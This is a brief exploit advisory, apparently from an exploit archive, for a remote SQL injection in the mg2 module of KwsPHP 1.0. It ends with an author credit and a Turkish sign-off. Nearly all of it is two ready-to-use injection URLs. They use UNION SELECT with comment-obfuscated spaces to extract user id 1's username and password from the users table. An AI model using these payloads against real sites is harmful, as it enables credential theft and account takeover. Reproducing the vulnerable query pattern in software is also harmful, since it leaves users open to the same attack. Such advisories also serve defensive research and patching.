KwsPHP versions 1.0 suffers from a remote SQL injection vulnerability in the mg2 module.
9c6e7f7408f93e556952df410a7e13f6dc6238990eaff5d15cf905e55403ddeb
--------------------
KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
--------------------
Found : xoron
--------------------
Exploit:
Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*
Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*
--------------------
Bundan sonra hep tek, hep yek xoron..!
--------------------